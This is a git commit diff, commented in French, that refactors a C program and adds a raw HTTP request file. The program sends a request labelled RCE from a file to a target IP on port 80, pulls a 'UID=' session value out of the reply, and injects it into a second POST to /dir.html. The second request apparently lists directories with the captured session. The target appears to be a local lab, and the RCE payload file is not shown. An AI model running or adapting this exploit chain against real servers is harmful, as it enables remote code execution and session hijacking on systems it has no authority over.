update

2026-04-26 04:10:02 +02:00
parent 904f9d9ddb
commit 2ca0abe734
2 changed files with 242 additions and 71 deletions
@@ -3,79 +3,233 @@
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
+#include <unistd.h>

-int main(int argc, char** argv){
-  if (argc != 2){
-    printf("u must specifie IP addr\n");
-      exit(1);
-  }
-  printf("target = %s\n", argv[1]);
-  int domain = AF_INET;
-  int type = SOCK_STREAM;
-  int fd = socket(domain, type, 0);
-  printf("fd = %d\n", fd);
+void envoie_request(void);
+void recevoir_request(void);
+void recup_uid(void);

-  struct sockaddr_in dest_addr;
-  memset(&dest_addr, 0, sizeof(dest_addr)); 
-  dest_addr.sin_family = AF_INET;
-  dest_addr.sin_port = htons(80);
-  dest_addr.sin_addr.s_addr = inet_addr(argv[1]);
+int creer_et_connecter_socket(const char* ip_addr) {
+    int domain = AF_INET;
+    int type = SOCK_STREAM;
+    int fd = socket(domain, type, 0);
+    if (fd < 0) {
+        printf("Erreur création socket\n");
+        return -1;
+    }
+    printf("fd = %d\n", fd);

-  int ret = connect(fd,(struct sockaddr*)&dest_addr, sizeof(dest_addr));
-  printf("ret_connect = %d\n", ret);
+    struct sockaddr_in dest_addr;
+    memset(&dest_addr, 0, sizeof(dest_addr));
+    dest_addr.sin_family = AF_INET;
+    dest_addr.sin_port = htons(80);
+    dest_addr.sin_addr.s_addr = inet_addr(ip_addr);

-  FILE* fichier_out = fopen("request_rce.txt", "r");
-  fseek(fichier_out, 0, SEEK_END);
+    int ret = connect(fd, (struct sockaddr*)&dest_addr, sizeof(dest_addr));
+    if (ret < 0) {
+        printf("Erreur connexion\n");
+        close(fd);
+        return -1;
+    }
+    printf("ret_connect = %d\n", ret);
    
-  
-  int size = fichier_out->_offset;
-  char*	file_buffer = malloc(size);
-
-  fseek(fichier_out, 0, SEEK_SET);
-  fread(file_buffer, 1, size, fichier_out);
-
-  for (int i = 0; i < size; i++){
-	  char	c = file_buffer[i];
-	  if (c == '\n')
-		  send(fd, "\r\n", 2, 0);
-	  else
-		  send(fd, &c, 1, 0);
-  }
-  send(fd, "\r\n", 2, 0);
-
-  printf("recv:\n");
-  char	c = 0;
-  int n = 0;
-  char* text = calloc(1, 1);
-  int len = 0;
-  while (( n = recv(fd, &c, 1, 0)) > 0){
-	len = strlen(text) + 2;
-	text = realloc(text, len);
-	text[len - 2] = c;
-	text[len - 1] = 0;
-  }
-  int index = 0;
-  char	uid[400];
-  while (text[index]){
-	if (text[index] == 'U'){
-		if (strncmp(text + index, "UID=", 4) == 0){
-				printf("pattern found\n");
-				index += 4;
-				int j = 0 ;
-				while(text[index] && text[index] != ';' && text[index] != '\r' && text[index] != '\n'){
-					uid[j] = text[index];
-					j++;
-					index++;
-				}
-				uid[j + 1] = 0;
-				break;
-		}
-	}
-	index++;
-
-  }
-  printf("uid=%s\n", uid);
-  fclose(fichier_out);
-  free(file_buffer);
-  return 0;
+    return fd;
+}
+
+void envoyer_requete(int fd, const char* fichier_requete) {
+    FILE* fichier_out = fopen(fichier_requete, "r");
+    if (!fichier_out) {
+        printf("Erreur ouverture fichier: %s\n", fichier_requete);
+        return;
+    }
+    
+    fseek(fichier_out, 0, SEEK_END);
+    long size = ftell(fichier_out);
+    char* file_buffer = malloc(size + 1);
+    
+    fseek(fichier_out, 0, SEEK_SET);
+    fread(file_buffer, 1, size, fichier_out);
+    file_buffer[size] = '\0';
+    
+    printf("\n--- Envoi requête depuis %s ---\n", fichier_requete);
+    
+    for (int i = 0; i < size; i++) {
+        char c = file_buffer[i];
+        if (c == '\n')
+            send(fd, "\r\n", 2, 0);
+        else
+            send(fd, &c, 1, 0);
+    }
+    send(fd, "\r\n", 2, 0);
+    
+    free(file_buffer);
+    fclose(fichier_out);
+}
+
+void recevoir_reponse(int fd, char** reponse, int* taille) {
+    char c = 0;
+    int n = 0;
+    char* text = calloc(1, 1);
+    int len = 0;
+    
+    printf("\n--- Réponse reçue ---\n");
+    
+    struct timeval tv;
+    tv.tv_sec = 5;
+    tv.tv_usec = 0;
+    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));
+    
+    while ((n = recv(fd, &c, 1, 0)) > 0) {
+        printf("%c", c);
+        len = strlen(text) + 2;
+        text = realloc(text, len);
+        text[len - 2] = c;
+        text[len - 1] = 0;
+    }
+    
+    printf("\n--- Fin réponse ---\n");
+    
+    *reponse = text;
+    *taille = len;
+}
+
+char* extraire_uid(const char* reponse) {
+    int index = 0;
+    char* uid = malloc(400);
+    memset(uid, 0, 400);
+    
+    while (reponse[index]) {
+        if (reponse[index] == 'U') {
+            if (strncmp(reponse + index, "UID=", 4) == 0) {
+                printf("\nPattern UID= trouvé\n");
+                index += 4;
+                int j = 0;
+                while (reponse[index] && reponse[index] != ';' && 
+                       reponse[index] != '\r' && reponse[index] != '\n') {
+                    uid[j] = reponse[index];
+                    j++;
+                    index++;
+                }
+                uid[j] = 0;
+                break;
+            }
+        }
+        index++;
+    }
+    
+    if (strlen(uid) == 0) {
+        printf("UID non trouvé dans la réponse\n");
+        free(uid);
+        return NULL;
+    }
+    
+    printf("UID extrait = %s\n", uid);
+    return uid;
+}
+
+void envoyer_requete_dir_avec_token(int fd, const char* fichier_requete, const char* uid) {
+    FILE* fichier_out = fopen(fichier_requete, "r");
+    if (!fichier_out) {
+        printf("Erreur ouverture fichier: %s\n", fichier_requete);
+        return;
+    }
+    
+    fseek(fichier_out, 0, SEEK_END);
+    long size = ftell(fichier_out);
+    char* file_buffer = malloc(size + 1);
+    
+    fseek(fichier_out, 0, SEEK_SET);
+    fread(file_buffer, 1, size, fichier_out);
+    file_buffer[size] = '\0';
+    
+    printf("\n--- Envoi requête DIR avec UID: %s ---\n", uid);
+    
+    for (int i = 0; i < size; i++) {
+        char c = file_buffer[i];
+        printf("%c", c);
+        
+        if (c == 'U') {
+            if (strncmp(file_buffer + i, "UID=", 4) == 0) {
+                send(fd, file_buffer + i, 4, 0);
+                send(fd, uid, strlen(uid), 0);
+                send(fd, "\r\n", 2, 0);
+                printf("ID=%s", uid);
+                i += 3;
+                continue;
+            }
+        }
+        else if (c == '\n') {
+            send(fd, "\r\n", 2, 0);
+        }
+        else {
+            send(fd, &c, 1, 0);
+        }
+    }
+    send(fd, "\r\n\r\n", 4, 0);
+    
+    free(file_buffer);
+    fclose(fichier_out);
+}
+
+int main(int argc, char** argv) {
+    if (argc != 2) {
+        printf("Tu dois spécifier l'adresse IP\n");
+        exit(1);
+    }
+    
+    printf("target = %s\n", argv[1]);
+    
+    printf("\n========== PREMIÈRE REQUÊTE (RCE) ==========\n");
+    
+    int fd = creer_et_connecter_socket(argv[1]);
+    if (fd < 0) {
+        exit(1);
+    }
+    
+    envoyer_requete(fd, "request_rce.txt");
+    
+    char* reponse1 = NULL;
+    int taille1 = 0;
+    recevoir_reponse(fd, &reponse1, &taille1);
+    
+    char* uid = extraire_uid(reponse1);
+    
+    close(fd);
+    
+    if (!uid) {
+        printf("Impossible d'extraire l'UID, arrêt du programme\n");
+        free(reponse1);
+        exit(1);
+    }
+    
+    printf("\nUID récupéré avec succès: [%s]\n", uid);
+    
+    printf("\n========== DEUXIÈME REQUÊTE (DIR) ==========\n");
+    
+    int fd2 = creer_et_connecter_socket(argv[1]);
+    if (fd2 < 0) {
+        free(uid);
+        free(reponse1);
+        exit(1);
+    }
+    
+    envoyer_requete_dir_avec_token(fd2, "request_dir_with_token.txt", uid);
+    
+    char* reponse2 = NULL;
+    int taille2 = 0;
+    recevoir_reponse(fd2, &reponse2, &taille2);
+    
+    if (reponse2 && strlen(reponse2) > 0) {
+        printf("\n--- RÉPONSE DIR COMPLÈTE ---\n");
+        printf("%s\n", reponse2);
+    } else {
+        printf("\nAucune réponse reçue pour la requête DIR\n");
+    }
+    
+    close(fd2);
+    free(uid);
+    free(reponse1);
+    free(reponse2);
+    
+    return 0;
 }
@@ -0,0 +1,17 @@
+POST /dir.html HTTP/1.1
+Host: localhost
+sec-ch-ua-platform: "Windows"
+Accept-Language: fr-FR,fr;q=0.9
+sec-ch-ua: "Not-A.Brand";v="24", "Chromium";v="146"
+Content-Type: application/x-www-form-urlencoded
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36
+Accept: */*
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/main.html
+Accept-Encoding: gzip, deflate, br
+Cookie: client_lang=french; viewmode=0; UID=
+Connection: keep-alive